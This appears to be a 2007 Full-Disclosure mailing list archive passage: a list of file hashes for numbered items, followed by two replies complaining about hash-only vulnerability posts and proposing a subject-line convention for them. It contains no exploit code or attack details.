md5: fb65b27deb9df544ed186aad339e2bae
sha1: 49dc02e4172d42450b2f6ba92b5cc50420bded32
sha256:
0989416396fa41f5010fdb84a3c2750ba2eed0145572ef7b49a40295e52e8797

[ITEM #22]
md5: 6376c546ad740b111dbf17983666c1c5
sha1: e995ac32f319883a782753fadb5907521a1c7d63
sha256:
77efa42e2acf8c9f1080684a82089a5566029ef2907a86478711fb58d9ee5289

[ITEM #23]
md5: c1817c5a38690b9061da87cce906cf45
sha1: d43e0427af6a35c9c1a248d6d45de974d62343b2
sha256:
8ea3cd3c792a181d2fea3716639fbffb0f59a1d1329aac78dbb0d0fd0660b618

[ITEM #24]
md5: 3dd0989a8381ca412cdc77c31a362c24
sha1: 9992b046a04831d568eb4067a9231ae50dbebf46
sha256:
3077f614d3fe43696c64144db7d41ec11bba381c1b0b325c0cae846549820969

[ITEM #25]
md5: 0bec4bbdf3b470f7f183dbccd4c89dcb
sha1: ad7ade3ecf105a1773a6bc3a671902fc1ade2935
sha256:
f66339bf94e8f8b8b7830b38543312325f100757056c6fe34673caeb06879363

[ITEM #26]
md5: 2bf3e8bc0dd42d0df0e48a9dde856aeb
sha1: 1c423ee318e6e2836364f9765c6a98ca654358ec
sha256:
7139924cf262e3639c7d37e4d405afa10e23218bb92ef4112d71687909a3fcdf

[ITEM #27]
md5: 61c8b420784ac7f13093c385ab910bbd
sha1: 5cc0f6ba858bb949a7b0290bd76dadd058f86689
sha256:
9472c9aaca09acef2b599f23fd2f86f5e619b3304e6a21d5828587032160a772

[ITEM #28]
md5: ae97942b4badd2e578cf6e1a1d9d2642
sha1: 91ddaa0590d9e07e082daa14dcb8d97a08b4df7e
sha256:
06c14c95c3aaf35aee11dbef9850652822560ecf36e2dc013d9f189817b279fe

[ITEM #29]
md5: 6dea1704c9ea931b80c3bfb64699de33
sha1: 97bd3cbdefe4fcadf9fd2db65a0f0a0e284f0b13
sha256:
7b21c70f2f7e18cc72a2ae976045d626f1e65436fd295e9b86643fe11432ef01

[ITEM #30]
md5: 

Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance

2007-06-27 Thread Brian Eaton
On 6/27/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 For the love of god people can we stop with the hashing already?

The hashes would be less annoying if they had an easily filtered subject line.

Let me suggest that anyone who wants to publish a hash of
vulnerability report on full disclosure include the string MORH in
the subject line, in honor of the Month of Random Hashes project.
Presumably anyone with enough of a clue to want to publish a hash of a
vulnerability disclosure also has enough of a clue to do so with a
standard subject line.

Cheers,
Brian



Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance

2007-06-27 Thread scott
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Even better, if you push a hash on us, do tell whether it's a 0-day or a
known exploit.

Regards,
  Redhowlingwolves  
__
It's all about (IN)Security

http://www.hacking-passion.com







Brian Eaton wrote:
 On 6/27/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 For the love of god people can we stop with the hashing already?
 
 The hashes would be less annoying if they had an easily filtered subject line.
 
 Let me suggest that anyone who wants to publish a hash of
 vulnerability report on full disclosure include the string MORH in
 the subject line, in honor of the Month of Random Hashes project.
 Presumably anyone with enough of a clue to want to publish a hash of a
 vulnerability disclosure also has enough of a clue to do so with a
 standard subject line.
 
 Cheers,
 Brian
 
 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFGgzvFelSgjADJQKsRAk55AJ9Q5Sx7QEQ6y62W80vVutwtLk6wcACfY0sF
jksMVerCQhWjfG3d+Hw+tdc=
=OcE3
-END PGP SIGNATURE-
